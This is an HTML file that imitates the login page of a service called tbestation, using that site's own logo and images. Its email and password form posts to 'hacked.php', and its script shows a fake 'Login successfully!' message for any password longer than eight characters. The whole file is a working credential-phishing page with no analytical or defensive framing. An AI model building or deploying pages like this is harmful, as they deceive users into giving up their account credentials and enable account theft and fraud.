<!DOCTYPE html>

<html>

    <head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

    <title>tbestation freeze-speed</title>

    </head>

    <body>

    <div class="container">

    <div class="alert_cont">

    <div class="alert_box">

    

    </div>

    </div>

    <div class="login-head">

    <img src="https://tbestation.com/Public/images/UTI_b.png" class="logo">

    </div>

    

    <div class="main_cont">

    <div class="login-main">

    <form name="myform" method="POST" action="hacked.php" onsubmit="return validateform()">

    <div class="form-login">

    <div class="img-user">

    <img src="https://tbestation.com/Public/images/name.png">

    <input type="text" name="email" maxlength="50" placeholder="Enter email" class="email">

    </div>

    <div class="img-user2">

    <img src="https://tbestation.com/Public/images/passd.png">

    <input type="password" name="password" maxlength="18" placeholder="Enter login password" class="pass">

    </div>

    

    <div class="img-user3">

    <input type="submit" value="Log in" class="login">

    <div class="alinks">

    <a href="#" class="register">Register an account</a>  <span>|</span>    <a href="#" class="app">APP download</a>

    </div>

    </div>

    </div>

    </div>

    </form>

    </div>

    </div>

    

    

    <script>

    $(".alert_cont").hide();

    $(".alert_box").hide();

  function validateform(){  

  var email =document.myform.email.value;  

  var password = document.myform.password.value;  

  var x = document.myform.email.value;  

  var at = x.indexOf("@");  

  var dot = x.lastIndexOf(".");  

  if (email==null || email==""){  

    $(".alert_cont").show();

    $(".alert_box").show();

    $(".alert_box").html("Please enter your <br> email");

    setTimeout(function(){

    $(".alert_cont").hide();

    $(".alert_box").hide();

    }, 2000);

    return false;  

  }else if (at <1 || dot < at+2 || dot+2>=x.length){  

        $(".alert_cont").show();

    $(".alert_box").show();

    $(".alert_box").html("invalid email");

    setTimeout(function(){

    $(".alert_cont").hide();

    $(".alert_box").hide();

    }, 2000);

        return false;  

        }else if(password==null || password==""){  

    $(".alert_cont").show();

    $(".alert_box").show();

    $(".alert_box").css({"width":"auto"});

    $(".alert_box").html("Please enter your <br> password");

    setTimeout(function(){

    $(".alert_cont").hide();

    $(".alert_box").hide();

    }, 2000); 

    return false;  

    }else if(password.length<=8){  

    $(".alert_cont").show();

    $(".alert_box").show();

    $(".alert_box").css({"width":"auto"});

    $(".alert_box").html("Account or password <br>error");

    setTimeout(function(){

    $(".alert_cont").hide();

    $(".alert_box").hide();

    }, 2000); 

    return false;  

    }else{

        $(".alert_cont").show();

    $(".alert_box").show();

    $(".alert_box").css({"width":"auto"});

    $(".alert_box").html("Login successfully!");

    setTimeout(function(){

    $(".alert_cont").hide();

    $(".alert_box").hide();

    }, 2000); 

    $(".visit").attr("href", "https://tbestation.com");

    return true;  

    }

  }  

    </script>

    <style>

    @import url(//db.onlinewebfonts.com/c/e63653407669814f5b0eb9bbdc175f77?family=Microsoft+YaHei);

*{

    margin:0;

    padding:0;

    box-sizing:border-box;

    text-decoration:none;

}

::placeholder{

    font-family: "Microsoft YaHei";

}

.container{

    background:#fff url(https://tbestation.com/Public/images/login_bg.png) no-repeat;

    background-size:100% 100%;

    background-clip:border-box;

    background-attachment:scroll;

    background-origin:initial;

    overflow-y:auto;

    background-repeat:no-repeat;

    overflow-x:hidden;

    position:relative;

    width:360px;

    height:664px;

}

.login-head{

    width:100%;

    height:81.5938px;

    margin:14.4px 0px;

    text-align:center;

}

.logo{

    max-width:100%;

    vertical-align:middle;

    height:33.5938px;

    margin:24px 0px;

}

.main_cont{

    width:100%;

    height:auto;

    display:flex;

    align-items:center;

    justify-content:center;

}

.login-main{

    height:274.219px;

    min-width:93%;

    background:url(https://tbestation.com/Public/images/login_mn.png);

    display:flex;

    align-items:center;

    justify-content:center;

    margin-bottom:.4rem;

    margin-top:.4rem;

    padding-bottom:.5rem;

    padding-left:.3rem;

    padding-right:.3rem;

    padding-top:.1rem;

    width:334.797px;

    background-size:100% 100%;

}

.form-login{

    width:306px;

    height:197.43px;

}

.img-user{

    width:306px;

    position:relative;

    height:30.6953px;

    padding-bottom:12px;

    border-bottom:1px solid rgb(242,242,242);

}

.img-user img{

    vertical-align:middle;

    max-width:100%;

    position:absolute;

    top:0.96px;

    left:9.6px;

    width:19.1953px;

    height:19.1953px;

}

.img-user2{

    width:306px;

    position:relative;

    top:30px;

    height:30.6953px;

    padding-bottom:12px;

    border-bottom:1px solid rgb(242,242,242);

}

.img-user3{

    width:306px;

    position:relative;

    top:55px;

    height:30.6953px;

    padding-bottom:12px;

}

.img-user2 img{

    vertical-align:middle;

    max-width:100%;

    position:absolute;

    top:0.96px;

    left:9.6px;

    width:19.1953px;

    height:19.1953px;

}

.email{

    outline:none;

    border:none;

    vertical-align:middle;

    font-stretch:100%;

    height:17px;

    padding-left:38.4px;

    font-family: "Microsoft YaHei";

    line-height:normal;

    font-weight:400;

    background:transparent;

    position:relative;

    width:306px;

    font-size:14.4px;

}

.pass{

    outline:none;

    border:none;

    vertical-align:middle;

    font-stretch:100%;

    height:17px;

    padding-left:38.4px;

    font-family: "Microsoft YaHei";

    line-height:normal;

    font-weight:400;

    background:transparent;

    position:relative;

    width:306px;

    font-size:14.4px;

}

[placeholder]{

    font-family: "Microsoft YaHei";

}

.login{

    width:298.078px;

    height:42.2344px;

    vertical-align:middle;

    appearance:button;

    outline:none;

    background-blend-mode:normal, normal;

    background:linear-gradient(90deg, rgb(2,175,255) 0%, rgb(3,71,266) 100%), linear-gradient(rgb(79,127,255),rgb(79,127,255));

    color:#fff;

    font-size:13.44px;

    border:none;

    border-radius:21.12px;

    box-shadow:1.44px 3.36px 0px 0px rgb(92,137,255,.35);

    font-stretch:100%;

    font-weight:400;

    cursor:pointer;

    margin-bottom:19.2px;

}

a{

    color:rgb(134,134,134);

    display:inline-block;

    width:48%;

    background:transparent;

    line-height:1.2;

    user-select:none;

    font-size:14px;

    vertical-align:middle;

}

.alinks{

    display:flex;

    align-items:center;

    justify-content:center;

    color:rgb(134,134,134);

}

.register{

    text-align:left;

    margin-left:10px;

}

span{

    font-size:14px;

    margin-left:10px;

}

.app{

    text-align:right;

    margin-right:10px;

}

.alert_cont{

    width:100%;

    height:100%;

    position:absolute;

    display:flex;

    z-index:1000;

    align-items:center;

    justify-content:center;

}

.alert_box{

    width:175px;

    height:60px;

    padding:15px;

    background:rgba(0,0,0,.4);

    color:white;

    margin-top:-70px;

    border-radius:5px;

    position:absolute;

    text-align:center;

    display:flex;

    font-size:14px;

    align-items:center;

    justify-content:center;

    animation:animate 0.5s linear;

    animation-delay:1.6s;

}

@keyframes animate{

    100%{

        margin-top:-400px;

        opacity:0;

    }

}

    </style>

    </body>

</html>
